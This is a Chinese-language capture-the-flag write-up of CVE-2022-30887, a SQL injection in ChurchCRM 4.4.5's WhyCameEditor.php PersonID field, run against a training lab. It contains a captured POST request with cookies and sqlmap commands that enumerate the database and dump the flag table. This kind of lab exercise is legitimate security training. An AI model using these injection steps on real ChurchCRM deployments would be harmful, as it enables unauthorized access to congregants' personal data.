文章目录
- CVE-2022-30887
- 一、漏洞介绍
- 二、渗透步骤
- 1、打开网站
- 2、查找注入点
- 3、截取数据包
- 4、SQL注入
- (1)、探测数据库
- (2)、探测数据表
- (3)、探测列名
- (4)、查看flag值
CVE-2022-30887
一、漏洞介绍
ChurchCRM后台注入
ChurchCRM是一个为教会打造的开源 CRM 系统。
ChurchCRM 4.4.5版本存在安全漏洞,该漏洞源于/churchcrm/WhyCameEditor.php 中的“PersonID”字段存在安全问题。
二、渗透步骤
1、打开网站
http://eci-2ze8di7n1s8qcl3m64rl.cloudeci1.ichunqiu.com/session/begin
# 账号:admin
# 密码:123456
2、查找注入点
http://eci-2ze8di7n1s8qcl3m64rl.cloudeci1.ichunqiu.com/WhyCameEditor.php?PersonID=1
3、截取数据包
POST /WhyCameEditor.php?PersonID=1&WhyCameID=&linkBack= HTTP/1.1
Host: eci-2ze8di7n1s8qcl3m64rl.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: http://eci-2ze8di7n1s8qcl3m64rl.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze8di7n1s8qcl3m64rl.cloudeci1.ichunqiu.com/WhyCameEditor.php?PersonID=1
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687499096,1687663463,1688006025,1688012314; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=bb80dc2c917de137e23a4ce817223d504c39fc4a; browse=CFlZTxUYU0BRVlFGVQJTRFBZSkdeQ1pYWVVFRl5RWERTU1xPX0dLThQ; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1688012314; CRM-40d1b2d83998fabacb726e5bc3d22129=6ibk4k788kbbee1oh19nqjf672
Upgrade-Insecure-Requests: 1
Join=test&Come=test&Suggest=test&HearOfUs=test&Submit=Save
4、SQL注入
(1)、探测数据库
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -p PersonID -dbs --batch
(2)、探测数据表
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -p PersonID -D ctf --tables --batch
(3)、探测列名
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -p PersonID -D ctf -T flag --columns --batch
(4)、查看flag值
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -p PersonID -D ctf -T flag -C flag --dump --batch
